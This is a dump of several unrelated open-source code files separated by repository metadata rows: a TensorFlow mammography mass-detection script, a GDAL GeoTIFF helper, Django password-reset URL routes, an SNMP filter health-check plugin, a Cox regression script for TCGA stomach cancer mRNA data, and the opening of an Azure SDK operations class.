evaluation_metric_objective = 1 #1 in case of Maximization and -1 in case of Minimization (ONLY POSITIVE VALUES)
number_of_evaluation_metrics = 4
metrics_array = np.zeros((number_of_epochs,number_of_evaluation_metrics*2+1))
max_evaluation_metric = -1e9
"""
CONFIGURE PATCH LOADER
"""
sess = tf.Session()
sess.run(tf.global_variables_initializer())
acts_list, loss_list, y_list = [],[],[]
#if load_weights_path:
#model.load(sess,load_weights_path)
epoch_counter = 0
for iteration in range(training_iterations):
# GET LOADED BATCH
batchx,batchy = pl.get_prepared_batch()
# START LOADING NEXT BATCH
pl.load_random_batch("train")
# TRAIN THE MODEL ON THE CURRENT BATCH
loss,acts = model.train(sess,batchx,batchy,learning_rate)
# APPEND ITERATION RESULTS IN THE LISTS
acts_list.append(acts)
loss_list.append(loss)
y_list.append(batchy)
if (iteration)%one_epoch_every == 0:
split_counter = pl.iterative_load_full_split("validation",0)
val_acts_list, val_loss_list, val_y_list = [],[],[]
while True:
val_batchx,val_batchy = pl.get_prepared_batch()
split_counter = pl.iterative_load_full_split("validation",split_counter)
val_loss,val_acts = model.test(sess,val_batchx,val_batchy)
val_acts_list.append(val_acts)
val_loss_list.append(val_loss)
val_y_list.append(val_batchy)
if split_counter == 0:
val_batchx,val_batchy = pl.get_prepared_batch()
val_loss,val_acts = model.test(sess,val_batchx,val_batchy)
val_acts_list.append(val_acts)
val_loss_list.append(val_loss)
val_y_list.append(val_batchy)
break
pl.load_random_batch("train")
# COMPUTE METRICS FOR THE TRAINING SET
acts_list = ut.concatenate_arrays(acts_list)[:,1]
loss_list = np.array(loss_list)
y_list = ut.concatenate_arrays(y_list)
metrics = ut.ut_metrics(acts_list, y_list,loss_list)
acts_list, loss_list, y_list = [],[],[]
# COMPUTE METRICS FOR THE VALIDATION SET
val_acts_list = ut.concatenate_arrays(val_acts_list)[:,1]
val_loss_list = np.array(val_loss_list)
val_y_list = ut.concatenate_arrays(val_y_list)
val_metrics = ut.ut_metrics(val_acts_list, val_y_list,val_loss_list)
# PRINT RESULTS
result_string = "Iter: "+str(iteration)
result_string += " | Train: "
for metric in metrics:
result_string += (metric[0] + ": " + str(metric[1]) + ", ")
# PRINT RESULTS
result_string += " | Validation: "
for metric in val_metrics:
result_string += (metric[0] + ": " + str(metric[1]) + ", ")
print_s(result_string,log_file)
# SAVE MODEL IF IT IS THE BEST
curr_evaluation_metric = evaluation_metric_objective * val_metrics[evaluation_metric_index][1]
if curr_evaluation_metric>max_evaluation_metric:
max_evaluation_metric = curr_evaluation_metric
model.save(sess,save_weights_path)
metrics_array[epoch_counter,0] = epoch_counter
i=1
for metric in metrics+val_metrics:
metrics_array[epoch_counter,i] = metric[1]
i+=1
epoch_counter+=1
log_file.close()
np.save(metrics_save_path,metrics_array[0:epoch_counter,:])
sess.close()
return metrics_array[0:epoch_counter,:]
import glob
def create_second_dataset(dataset_first,experiment_name,threshold=0.5):
print("Creating Second Dataset")
tf.reset_default_graph()
sess = tf.Session()
results_path = "/home/eduardo/Results/"+experiment_name
dataset_second = results_path+"/second_dataset/"
os.mkdir(dataset_second)
load_weights_path = results_path+"/model1"
model,model_full = load_model(sess,1,load_weights_path)
splits = ["train","validation","test"]
for split in splits:
os.makedirs(dataset_second+split+"/negative")
os.makedirs(dataset_second+split+"/positive")
print("Doing:",split)
neg_images = glob.glob(dataset_first+"/"+split+"/negative/*.npy")
pos_images = glob.glob(dataset_first+"/"+split+"/positive/*.npy")
bar = ut.progress_bar(len(neg_images)+len(pos_images))
for file in neg_images:
bar.tick()
img = np.load(file)
_,pred = model.test(sess,img[np.newaxis,:,:,np.newaxis],np.zeros((1,)))
if pred[0,1]>threshold:
copyfile(file,dataset_second+"/"+split+"/negative/"+os.path.basename(file))
for file in pos_images:
bar.tick()
copyfile(file,dataset_second+"/"+split+"/positive/"+os.path.basename(file))
copyfile(dataset_first+"/dataset_test",dataset_second+"/dataset_test")
print("FINISHED Creating Second Dataset")
"""
# TODO WITH MODEL NUMBER: IDEA -> Use recursion
def test_model(model_num, experiment_name, dataset_first,sigma=2,num_dets=10,thresh=0.5,sufix=""):
tf.reset_default_graph()
sess = tf.Session()
results_path = "/home/eduardo/Results/"+experiment_name
#os.mkdir(results_path+"/heatmaps"+str(model_num))
load_weights_path = results_path+"/model1"
model,model_full = load_model(sess,model_num,load_weights_path)
iDs = dataset_first.files_names.keys()
all_suspicions = dict()
bar = ut.progress_bar(len(iDs))
for iD in iDs: # TODO
bar.tick()
all_suspicions[iD] = list()
image = np.load(dataset_first.files_names[iD])
htmap = model_full.test(sess,image)
htmap = iproc.filter_img(htmap,sigma)
htmap = htmap*(htmap>thresh)
htmap = iproc.improved_non_maxima_supression(htmap)
#np.save(results_path+"/heatmaps"+str(model_num)+"/"+os.path.basename(dataset_first.files_names[iD]),htmap)
dets = iproc.detections(htmap,num_dets)
masks = []
masks_files = dataset_first.masks[iD]
for file in masks_files:
mask = np.load(file)
mask = augment_mask(mask)
masks.append(mask)
masks_hit = np.zeros(len(masks))
for det in dets:
correct_mask = inside_masks(det,masks,masks_hit)
if correct_mask!=-1:
if not masks_hit[correct_mask]:
all_suspicions[iD].append([*det,"TP"])
masks_hit[correct_mask]=1
else:
all_suspicions[iD].append([*det,"FP"])
for i in range(len(masks_hit)):
if masks_hit[i] == 0:
all_suspicions[iD].append([-1,-1,"FN"])
pkl.dump(all_suspicions,open(results_path+"/all_suspicions"+sufix,"wb"))
compute_score(all_suspicions,results_path,sufix)
sess.close()
return all_suspicions
"""
def create_pmaps(experiment_name, dataset_first):
#tf.reset_default_graph()
#sess = tf.Session()
results_path = "/home/eduardo/Results/"+experiment_name
#os.mkdir(results_path+"/pmaps")
#load_weights_path1 = results_path+"/model1"
#_,model_full1 = load_model(sess,1,load_weights_path1)
iDs = dataset_first.files_names.keys()
bar = ut.progress_bar(len(iDs))
for iD in iDs: # TODO
bar.tick()
#image = np.load(dataset_first.files_names[iD])
#pmap = model_full1.test(sess,image)
#np.save(results_path+"/pmaps"+"/"+str(iD),pmap)
masks = get_masks(dataset_first.masks[iD],add=False)
for i in range(len(masks)):
np.save(results_path+"/pmaps"+"/m"+str(iD)+"_"+str(i),masks[i])
#sess.close()
def test_model(experiment_name, dataset_first,sigma=1,num_dets=40,thresh=0.5, both_models = False):
tf.reset_default_graph()
sess = tf.Session()
results_path = "/home/eduardo/Results/"+experiment_name
load_weights_path1 = results_path+"/model1"
if both_models:
load_weights_path2 = results_path+"/model2"
_,model_full1 = load_model(sess,1,load_weights_path1)
if both_models:
model2,_ = load_model(sess,2,load_weights_path2)
iDs = dataset_first.files_names.keys()
sufix = ""
if both_models: sufix = "second"
all_suspicions = dict()
bar = ut.progress_bar(len(iDs))
for iD in iDs: # TODO
bar.tick()
all_suspicions[iD] = list()
image = np.load(dataset_first.files_names[iD])
detections = get_dets(sess, model_full1, image, sigma=sigma, thresh=thresh, num_dets=num_dets)
if both_models:
detections = reclassify_detections(sess,model2,image,detections)
for i in range(len(detections)):
plt.scatter(detections[i][0][1],detections[i][0][0],c="b")
plt.imshow(model_full1.test(sess,image))
plt.show()
masks = get_masks(dataset_first.masks[iD])
all_suspicions[iD] += get_suspicions(detections, masks)
pkl.dump(all_suspicions,open(results_path+"/all_suspicions"+sufix,"wb"))
compute_score(all_suspicions,results_path,sufix)
sess.close()
return all_suspicions
def reclassify_detections(sess,model,image,detections):
patches = np.zeros((len(detections),36,36,1))
image = iproc.all_pad(image, 20, "reflect")
counter = 0
for det in detections:
x,y = det[0]+20
patches[counter,:,:,0] = image[x-18:x+18,y-18:y+18]
counter+=1
_,preds = model.test(sess,patches,np.ones(len(detections)))
counter = 0
for det in detections:
detections[counter][1] = preds[counter,1]
counter+=1
return detections
def get_suspicions(detections,masks):
suspicions = []
masks_hit = np.zeros(len(masks))
for det in detections:
correct_mask = inside_masks(det,masks,masks_hit)
if correct_mask!=-1:
if not masks_hit[correct_mask]:
suspicions.append([*det,"TP"])
masks_hit[correct_mask]=1
else:
suspicions.append([*det,"FP"])
for i in range(len(masks_hit)):
if masks_hit[i] == 0:
suspicions.append([-1,-1,"FN"])
return suspicions
def get_dets(sess, model_full, image, sigma=0.8, thresh=-1, num_dets=40):
htmap = model_full.test(sess,image)
#htmap = iproc.filter_img(htmap,sigma)
htmap = htmap*(htmap>thresh)
htmap = iproc.improved_non_maxima_supression(htmap)
#np.save(results_path+"/heatmaps"+str(model_num)+"/"+os.path.basename(dataset_first.files_names[iD]),htmap)
dets = iproc.detections(htmap,num_dets)
return dets
def get_masks(masks_files,add=True):
masks = []
for file in masks_files:
mask = np.load(file)
if add:
mask = augment_mask(mask)
masks.append(mask)
return masks
from scipy.ndimage.measurements import center_of_mass as center_of_mass
def augment_mask(mask):
center = center_of_mass(mask)
mask[int(np.floor(center[0]))-9:int(np.ceil(center[0]))+9,int(np.floor(center[1]))-9:int(np.ceil(center[1]))+9] = True
#plt.imshow(mask)
#plt.show()
return mask
def compute_score(all_suspicions,results_path="",sufix=""):
num_of_masses = 0
num_of_images = 0
for image in all_suspicions.keys():
num_of_images+=1
for susp in all_suspicions[image]:
if susp[2] in ["TP","FN"]:
num_of_masses+=1
print("Working with:",num_of_masses," masks")
print("Working with:",num_of_images," images")
tp = np.zeros(num_of_masses)
fp = list()
counter=0
for image in all_suspicions.keys():
for susp in all_suspicions[image]:
if susp[2] == "TP":
tp[counter] = susp[1]
counter+=1
elif susp[2] == "FP":
fp.append(susp[1])
finalTP = np.stack((tp,np.ones(tp.shape)),axis=1)
fp = np.array(fp)
finalFP = np.stack((fp,np.zeros(fp.shape)),axis=1)
final = np.concatenate((finalTP,finalFP),axis = 0)
indexes = np.argsort(final[:,0])
final[:] = final[indexes[::-1]]
tpr_vec = np.cumsum(final[:,1])/num_of_masses
fpi_vec = np.cumsum(final[:,1]==0)/num_of_images
plt.scatter(fpi_vec,tpr_vec,s=0.1)
pkl.dump([fpi_vec,tpr_vec],open(results_path+"/fpi_tpr_vecs"+sufix,"wb"))
plt.savefig(results_path+"/Free_Roc_Curve"+sufix)
return final,fpi_vec,tpr_vec
def inside_masks(det,masks,masks_hit):
for i in range(masks_hit.shape[0]):
center = det[0]
mask = masks[i]
#plt.imshow(mask)
#plt.show()
#print(center)
if mask[center[0],center[1]]:
return i
return -1
def load_model(sess,model_num,load_weights_path):
print(load_weights_path)
model = models.detector36(False, "model"+str(model_num), False,False,False)
model.load(sess,load_weights_path)
model_full = models.detector36(True, "model"+str(model_num), True,False,False)
return model,model_full
#dataset = pkl.load(open("/home/eduardo/data_inbreast_40_deform_elas/dataset_test","rb"))
#experiment_name = "Batch_Dropout_exp_False_True"
#create_pmaps(experiment_name,dataset)
#data = pkl.load(open("/home/eduardo/data_inbreast_40_deform_elas/dataset_test","rb"))
#exp_name = "Batch_Dropout_exp_False_True"
#test_model(exp_name,data)
| apache-2.0 | 2,359,735,837,977,057,300 | 32.257202 | 131 | 0.580276 | false |
DREAM-ODA-OS/tools | imgproc/img/geotiff.py | 1 | 3410 | #!/usr/bin/env python
#-------------------------------------------------------------------------------
#
# GeoTIFF creation subroutine
#
# Author: Martin Paces <[email protected]>
#
#-------------------------------------------------------------------------------
# Copyright (C) 2016 EOX IT Services GmbH
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies of this Software or works derived from this Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
#-------------------------------------------------------------------------------
from osgeo import gdal; gdal.UseExceptions() #pylint: disable=multiple-statements
from .file_io import ImageFileWriter, DT2GDT
from .util import FormatOptions
# default GeoTIFF file-options
DEF_GEOTIFF_FOPT = {
"TILED": "YES",
"BLOCKXSIZE": "256",
"BLOCKYSIZE": "256",
"COMPRESS": "NONE",
}
def make_gcp(x, y, z, p, l, id_, info=""):
""" Construct GDAL Ground Control Point. """
#pylint: disable=invalid-name, too-many-arguments
return gdal.GCP(x, y, z, p, l, info, str(id_))
def clone_gcp(gcp):
""" Clone GCP object. """
return gdal.GCP(
gcp.GCPX, gcp.GCPY, gcp.GCPZ, gcp.GCPPixel, gcp.GCPLine, gcp.Info, gcp.Id
)
def create_geotiff(path, dtype, nrow, ncol, nband=1, proj=None,
geotrn=None, gcps=None, nodata=None, options=None):
""" Create a GeoTIFF image and return an instance of the ImageFileWriter
class to access this file.
"""
#pylint: disable=too-many-arguments, too-many-locals
# sanitize the inputs
nrow = max(0, int(nrow))
ncol = max(0, int(ncol))
nband = max(1, int(nband))
if options is None:
options = FormatOptions(DEF_GEOTIFF_FOPT).options
# convert type to gdal type
try:
gdal_dtype = DT2GDT[dtype]
except KeyError:
raise ValueError("Unsupported data type! %r" % dtype)
# get GDAL Driver
driver = gdal.GetDriverByName("GTiff")
# create TIFF image
dataset = driver.Create(path, ncol, nrow, nband, gdal_dtype, options)
if proj and geotrn:
# set geo-transformation
dataset.SetProjection(proj)
dataset.SetGeoTransform(geotrn)
elif proj and gcps:
# copy ground control points (a.k.a. tie-points)
dataset.SetGCPs([clone_gcp(gcp) for gcp in gcps], proj)
# create image object
writer = ImageFileWriter(dataset)
#copy no-data value(s)
if nodata is not None:
writer.nodata = nodata
return writer
| mit | 48,940,018,558,685,450 | 33.795918 | 81 | 0.642522 | false |
mathiasertl/django-xmpp-server-list | account/auth_urls.py | 1 | 1456 | # This file is part of django-xmpp-server-list
# (https://github.com/mathiasertl/django-xmpp-server-list)
#
# django-xmpp-server-list is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# xmppllist is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with django-xmpp-server-list. If not, see <http://www.gnu.org/licenses/>.
from django.urls import path
from . import views
# auth views are included in a separate urls file to exclude the namespace (url names are used throughout
# handy predefined templates).
urlpatterns = [
path('password_change/', views.PasswordChangeView.as_view(), name='password_change'),
path('password_reset/', views.PasswordResetView.as_view(), name='password_reset'),
path('password_reset/done/', views.PasswordResetDoneView.as_view(), name='password_reset_done'),
path('reset/<uidb64>/<token>/', views.PasswordResetConfirmView.as_view(), name='password_reset_confirm'),
path('reset/done/', views.PasswordResetCompleteView.as_view(), name='password_reset_complete'),
]
| gpl-3.0 | -7,956,175,443,058,019,000 | 49.206897 | 109 | 0.752747 | false |
rsmuc/health_monitoring_plugins | health_monitoring_plugins/trustedfilter.py | 1 | 5728 | # Copyright (C) 2017-2019 rsmuc <[email protected]>
# This file is part of "Health Monitoring Plugins".
# "Health Monitoring Plugins" is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 2 of the License, or
# (at your option) any later version.
# "Health Monitoring Plugins" is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
# You should have received a copy of the GNU General Public License
# along with "Health Monitoring Plugins". If not, see <https://www.gnu.org/licenses/>.
from pynag.Plugins import PluginHelper,ok,warning,critical,unknown
import health_monitoring_plugins
# these dicts / definitions we need to get human readable values
states = {
1: 'ok',
2: 'failed',
3: 'absent',
4: 'AC off'
}
activity = {
1: 'standby',
2: 'active',
3: 'error'
}
# OIDs
activity_oid = '.1.3.6.1.4.1.2566.107.41.1.0' # tfDeviceActivityState
logfill_oid = '.1.3.6.1.4.1.2566.107.31.2.1.0' # slIpStatusLogFillLevel
ps1_oid = '.1.3.6.1.4.1.2566.107.31.2.2.0' # slIpStatusPowerSupplyUnit1
ps2_oid = '.1.3.6.1.4.1.2566.107.31.2.3.0' # slIpStatusPowerSupplyUnit2
fan1_oid = '.1.3.6.1.4.1.2566.107.31.2.4.0' # slIpStatusPowerFanUnit1
fan2_oid = '.1.3.6.1.4.1.2566.107.31.2.5.0' # slIpStatusPowerFanUnit2
bat_oid = '.1.3.6.1.4.1.2566.107.31.2.7.0' # slIpStatusInternalVoltage
temp_oid = '.1.3.6.1.4.1.2566.107.31.2.8.0' # slIpStatusInternalTemperature
activity_oid = '.1.3.6.1.4.1.2566.107.41.1.0' # tfDeviceActivityState
class TrustedFilter(object):
def __init__(self, helper, snmp1, snmp2=None):
self.helper = helper
self.snmp1 = snmp1
self.snmp2 = snmp2
def get_snmp_from_host1(self):
"""
Get SNMP values from 1st host.
"""
response = self.snmp1.get_oids(ps1_oid, ps2_oid, fan1_oid, fan2_oid, bat_oid, temp_oid, activity_oid, logfill_oid)
self.ps1_value = states[int(response[0])]
self.ps2_value = states[int(response[1])]
self.fan1_value = states[int(response[2])]
self.fan2_value = states[int(response[3])]
self.bat_value = states[int(response[4])]
self.temp_value = states[int(response[5])]
self.activity_value1 = activity[int(response[6])]
self.logfill_value = str(response[7])
def get_snmp_from_host2(self):
"""
Get SNMP values from 2nd host.
"""
if not self.snmp2:
self.activity_value2 = None
else:
response = self.snmp2.get_oids(activity_oid)
self.activity_value2 = activity[int(response[0])]
def check(self):
"""
Evaluate health status from device parameters.
"""
try:
self.get_snmp_from_host1()
self.get_snmp_from_host2()
except (health_monitoring_plugins.SnmpException, TypeError, KeyError):
self.helper.status(unknown)
self.helper.add_summary("SNMP response incomplete or invalid")
return
self.helper.add_summary("Filter Status")
self.helper.add_long_output("Power Supply 1: %s" % self.ps1_value)
if self.ps1_value != "ok":
self.helper.status(critical)
self.helper.add_summary("Power Supply 1: %s" % self.ps1_value)
self.helper.add_long_output("Power Supply 2: %s" % self.ps2_value)
if self.ps2_value != "ok":
self.helper.status(critical)
self.helper.add_summary("Power Supply 2: %s" % self.ps2_value)
self.helper.add_long_output("Fan 1: %s" % self.fan1_value)
if self.fan1_value != "ok":
self.helper.status(critical)
self.helper.add_summary("Fan 1: %s" % self.fan1_value)
self.helper.add_long_output("Fan 2: %s" % self.fan2_value)
if self.fan2_value != "ok":
self.helper.status(critical)
self.helper.add_summary("Fan 2: %s" % self.fan2_value)
self.helper.add_long_output("Battery: %s" % self.bat_value)
if self.bat_value != "ok":
self.helper.status(critical)
self.helper.add_summary("Battery: %s" % self.bat_value)
self.helper.add_long_output("Temperature: %s" % self.temp_value)
if self.temp_value != "ok":
self.helper.status(critical)
self.helper.add_summary("Temperature: %s" % self.temp_value)
self.helper.add_metric(label='logfill',value=self.logfill_value, uom="%%")
self.helper.add_long_output("Fill Level internal log: %s%%" % self.logfill_value)
self.helper.add_long_output("Activity State: %s" % self.activity_value1)
if self.activity_value1 == "error":
self.helper.status(critical)
self.helper.add_summary("Activity State: %s" % self.activity_value1)
if self.activity_value2:
self.helper.add_long_output("Activity State 2: %s" % self.activity_value2)
if self.activity_value1 == "active" and self.activity_value2 == "active":
self.helper.status(critical)
self.helper.add_summary("Filter 1 and Filter 2 active!")
if self.activity_value1 == "standby" and self.activity_value2 == "standby":
self.helper.status(critical)
self.helper.add_summary("Filter 1 and Filter 2 standby!")
self.helper.check_all_metrics()
| gpl-2.0 | 8,863,428,745,276,231,000 | 40.507246 | 122 | 0.615922 | false |
OmnesRes/onco_lnc | mrna/cox/STAD/cox_regression.py | 1 | 10031 | ## A script for finding every cox coefficient and pvalue for every mRNA in STAD Tier 3 data downloaded Jan. 5th, 2016
from rpy2 import robjects as ro
import numpy as np
import os
ro.r('library(survival)')
import re
##This call will only work if you are running python from the command line.
##If you are not running from the command line manually type in your paths.
BASE_DIR = os.path.dirname(os.path.dirname(os.path.dirname(os.path.dirname(os.path.abspath(__file__)))))
## Read the follow up data
## A patient can be listed multiple times in the file. The most recent listing (furthest down in the file), contains the most recent
## follow up data. This code checks if the patient has already been loaded into the list, and if so, takes the more recent data.
## This required an empty value in the list initialization.
## Data is: [[Patient ID, time(days), Vital status],[Patient ID, time(days), Vital status],...]
f=open(os.path.join(BASE_DIR,'tcga_data','STAD','clinical','nationwidechildrens.org_clinical_follow_up_v1.0_stad.txt'))
##get the column indexes needed
columns=f.readline().split('\t')
patient_column=columns.index('bcr_patient_barcode')
alive_column=columns.index('last_contact_days_to')
death_column=columns.index('death_days_to')
f.readline()
f.readline()
data=[i.split('\t') for i in f]
clinical1=[['','','']]
for i in data:
if clinical1[-1][0]==i[patient_column]:
if re.search('^[0-9]+$',i[death_column]):
clinical1[-1]=[i[patient_column],int(i[death_column]),'Dead']
elif re.search('^[0-9]+$',i[alive_column]):
clinical1[-1]=[i[patient_column],int(i[alive_column]),'Alive']
else:
pass
else:
if re.search('^[0-9]+$',i[death_column]):
clinical1.append([i[patient_column],int(i[death_column]),'Dead'])
elif re.search('^[0-9]+$',i[alive_column]):
clinical1.append([i[patient_column],int(i[alive_column]),'Alive'])
else:
pass
## Removing the empty value.
clinical=clinical1[1:]
## Grade, sex and age information were taken from the "clinical_patient" file. A dictionary was created for grade and sex.
more_clinical={}
grade_dict={}
grade_dict['G1']=1
grade_dict['G2']=2
grade_dict['G3']=3
sex_dict={}
sex_dict['MALE']=0
sex_dict['FEMALE']=1
## The "clinical_patient" file can also contain patients not listed in the follow_up files.
## In these cases the clinical data for these patients gets appended to a new clinical list.
f=open(os.path.join(BASE_DIR,'tcga_data','STAD','clinical','nationwidechildrens.org_clinical_patient_stad.txt'))
##get the column indexes needed
columns=f.readline().split('\t')
grade_column=columns.index('tumor_grade')
sex_column=columns.index('gender')
age_column=columns.index('age_at_initial_pathologic_diagnosis')
patient_column=columns.index('bcr_patient_barcode')
alive_column=columns.index('last_contact_days_to')
death_column=columns.index('death_days_to')
f.readline()
f.readline()
data=[i.split('\t') for i in f]
clinical4=[]
for i in data:
try:
more_clinical[i[patient_column]]=[grade_dict[i[grade_column]],sex_dict[i[sex_column]],int(i[age_column])]
if re.search('^[0-9]+$',i[death_column]):
clinical4.append([i[patient_column],int(i[death_column]),'Dead'])
elif re.search('^[0-9]+$',i[alive_column]):
clinical4.append([i[patient_column],int(i[alive_column]),'Alive'])
else:
pass
except:
pass
new_clinical=[]
##It is possible that the clinical data in the clinical_patient file is more up to date than the follow_up files
##All the clinical data is merged checking which data is the most up to date
for i in clinical4:
if i[0] not in [j[0] for j in clinical]:
new_clinical.append(i)
else:
if i[1]<=clinical[[j[0] for j in clinical].index(i[0])][1]:
new_clinical.append(clinical[[j[0] for j in clinical].index(i[0])])
else:
new_clinical.append(i)
##also do the reverse since clinical can contain patients not included in clinical4
for i in clinical:
if i[0] not in [j[0] for j in new_clinical]:
new_clinical.append(i)
## only patients who had a follow up time greater than 0 days are included in the analysis
clinical=[i for i in new_clinical if i[1]>0]
final_clinical=[]
## A new list containing both follow up times and grade, sex, and age is constructed.
## Only patients with grade, sex, and age information are included.
## Data is [[Patient ID, time (days), vital status, grade, sex, age at diagnosis],...]
for i in clinical:
if i[0] in more_clinical:
final_clinical.append(i+more_clinical[i[0]])
## 01 indicates a primary tumor, and only primary tumors are included in this analysis
f=open(os.path.join(BASE_DIR,'tcga_data','STAD','FILE_SAMPLE_MAP_mrna.txt'))
f.readline()
data=[i.strip().split() for i in f if i!='\n']
## 01 indicates a primary tumor, and only primary tumors are included in this analysis
TCGA_to_mrna={}
for i in data:
## The normalized data files are used
if 'genes.normalized_results' in i[0]:
if i[1].split('-')[3][:-1]=='01':
x=''.join([k+j for k,j in zip(['','-','-'],i[1].split('-')[:3])])
TCGA_to_mrna[x]=TCGA_to_mrna.get(x,[])+[i[0]]
clinical_and_files=[]
## I only care about patients that contained complete clinical information
for i in final_clinical:
if TCGA_to_mrna.has_key(i[0]):
## The mRNA files are added to the clinical list
## Data structure: [[Patient ID, time (days), vital status, grade, sex, age at diagnosis,[mRNA files]],...]
clinical_and_files.append(i+[TCGA_to_mrna[i[0]]])
else:
pass
## A list of lists of genes is constructed, the order of gene lists is same as the clinical_and_files data
## Data structure: [[genes for patient 1], [genes for patient 2], ....]
genes=[]
for i in clinical_and_files:
temp=[]
for j in i[-1]:
f=open(os.path.join(BASE_DIR,'tcga_data','STAD','mrna',j))
f.readline()
temp.append([[i.split('|')[1].split()[0],float(i.strip().split()[-1])] for i in f])
## In the case that the patient only contained 1 primary tumor mRNA file.
if len(temp)==1:
genes.append(temp[0])
## If the patient contained more than 1 primary tumor mRNA file
## this list comprehension will average the files for any number of files.
else:
values=[]
for k in temp:
values.append([kk[1] for kk in k])
genes.append(zip([z[0] for z in temp[0]],list(sum([np.array(kkk) for kkk in values])/float(len(temp)))))
## Only want genes that meet an expression cutoff
## A cutoff of 1 RSEM and no more than a fourth of the patients containing no expression was chosen
final_genes=[[]]*len(genes)
for i in range(len(genes[0])):
temp=[]
for j in genes:
temp.append(j[i])
count=0
for k in temp:
if k[1]==0:
count+=1
median=np.median([ii[1] for ii in temp])
if count<len(genes)/4.0 and median>1:
for index, kk in enumerate(temp):
final_genes[index]=final_genes[index]+[kk]
## This will write the final genes to a large (100-300 MB file) which could be useful for further analyses, this step can be skipped.
f=open(os.path.join(BASE_DIR,'mrna','cox','STAD','final_genes.txt'),'w')
for i in final_genes:
f.write(str(i))
f.write('\n')
f.close()
##Performing Cox regression on all of the genes in final_genes
death_dic={}
death_dic['Alive']=0
death_dic['Dead']=1
coeffs=[]
pvalues=[]
genes=[] ##This list tracks the gene names
for i in range(len(final_genes[0])):
kaplan=[]
genes.append(final_genes[0][i][0])
for k,j in zip(clinical_and_files,final_genes): ## These lists contain the clinical information and mRNA data in the same order.
kaplan.append([k[1],k[2],k[3],k[4],k[5],j[i][1]])
data=[ii[-1] for ii in kaplan] ## Grabbing all the gene values for the current gene being analyzed
ro.globalenv['expression']=ro.FloatVector(data)
res=ro.r('round(qnorm((rank(expression, na.last="keep")-0.5)/sum(!is.na(expression))), digit=5)') ## Perform inverse normal transformation
inverse_norm=list(res) ## Convert robject to python list
## Prepare the variables for rpy2
ro.globalenv['gene']=ro.FloatVector(inverse_norm)
ro.globalenv['times']=ro.IntVector([ii[0] for ii in kaplan])
ro.globalenv['died']=ro.IntVector([death_dic[ii[1]] for ii in kaplan])
##grade1
grade1=[]
for ii in kaplan:
if ii[2]==1:
grade1.append(1)
else:
grade1.append(0)
##grade2
grade2=[]
for ii in kaplan:
if ii[2]==2:
grade2.append(1)
else:
grade2.append(0)
##grade3
grade3=[]
for ii in kaplan:
if ii[2]==3:
grade3.append(1)
else:
grade3.append(0)
ro.globalenv['grade1']=ro.IntVector(grade1)
ro.globalenv['grade2']=ro.IntVector(grade2)
ro.globalenv['grade3']=ro.IntVector(grade3)
ro.globalenv['sex']=ro.IntVector([ii[3] for ii in kaplan])
ro.globalenv['age']=ro.IntVector([ii[4] for ii in kaplan])
res=ro.r('coxph(Surv(times,died) ~ gene + sex + grade1 + grade2 + grade3 + age)') ## Perform Cox regression
## Parse the string of the result with python for the gene coefficient and pvalue
for entry in str(res).split('\n'):
try:
if entry.split()[0]=='gene':
coeff=entry.split()[1]
pvalue=entry.split()[-1]
break
except:
pass
coeffs.append(coeff)
pvalues.append(pvalue)
## This will write the results to a tab delimited file with gene name, cox coefficient, and pvalue.
f=open(os.path.join(BASE_DIR,'mrna','cox','STAD','coeffs_pvalues.txt'),'w')
for i,j,k in zip(genes,coeffs,pvalues):
f.write(i)
f.write('\t')
f.write(j)
f.write('\t')
f.write(k)
f.write('\n')
f.close()
| mit | -539,384,491,624,888,770 | 32.888514 | 142 | 0.64181 | false |
Azure/azure-sdk-for-python | sdk/network/azure-mgmt-network/azure/mgmt/network/v2020_04_01/aio/operations/_vpn_sites_configuration_operations.py | 1 | 8230 | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import Any, Callable, Dict, Generic, Optional, TypeVar, Union
import warnings
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import AsyncHttpResponse, HttpRequest
from azure.core.polling import AsyncLROPoller, AsyncNoPolling, AsyncPollingMethod
from azure.mgmt.core.exceptions import ARMErrorFormat
from azure.mgmt.core.polling.async_arm_polling import AsyncARMPolling
from ... import models as _models
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, AsyncHttpResponse], T, Dict[str, Any]], Any]]
class VpnSitesConfigurationOperations:
"""VpnSitesConfigurationOperations async operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:ivar models: Alias to model classes used in this operation group.
:type models: ~azure.mgmt.network.v2020_04_01.models
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = _models
def __init__(self, client, config, serializer, deserializer) -> None:
self._client = client
self._serialize = serializer
self._deserialize = deserializer
